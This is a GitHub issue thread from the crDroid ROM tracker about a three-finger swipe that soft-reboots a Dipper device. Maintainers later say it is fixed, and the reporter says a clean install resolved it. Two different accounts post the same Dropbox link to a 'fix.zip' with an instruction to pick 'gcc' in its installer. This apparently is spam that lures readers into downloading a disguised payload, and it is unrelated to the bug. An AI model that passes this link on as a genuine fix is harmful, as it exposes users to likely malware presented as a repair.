### ISSUE TITLE
When swaping screen with 3 fingers simultanously device soft reboot

### ISSUE THREAD

**Issue by jakubalex47** [crdroidandroid/issue_tracker#500]
### Issue type

Source code related

### Device

Dipper

### crDroid version

crDroid 10

### Exact version / Build date

Latest 10.7 build

### Bug description

When swaping screen with 3 fingers simultanously device makes soft reboot. Doesn't matter if I set up 3 fingers gesture to Take screenshot, Do nothing or anything else.

### Steps to reproduce

1. Go to crdroid settings and change 3 fingers gesture for ex. to Take screenshot or Do nothing
2. Swipe screen with 3 fingers
3. Device immediately makes soft reboot
4. After soft reboot apps related to kernelsu modules disappear forever (even after normal restart)
Log: 
[2024-08-25-13-49-06.txt](https://github.com/user-attachments/files/16742853/2024-08-25-13-49-06.txt)

### Relevant log (logcat/build log)

```shell
File attached.
```

### Acknowledgements

- [X] I've checked device is officially supported (for device specific reports and not source related).
- [X] I'm running latest version available on crdroid.net for this device
- [X] I have searched the existing issues and this is a new and no duplicate or related to another open issue.
- [X] I have written a short but informative title.
- [X] I filled out all of the requested information in this issue properly.

**Comment by esttemanb** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by seeronline** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by jakubalex47** [comment]
> Download https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1 In the installer menu, select "gcc."

Cannot download. Link is broken

**Comment by neobuddy89** [comment]
this is fixed. wait for new build. check if server has new build.

**Comment by jakubalex47** [comment]
Issue solved by clean install rom. You should advice to clean install 10.7 to avoid this problem

**Comment by gwolf2u** [comment]
Clean flash should not be needed
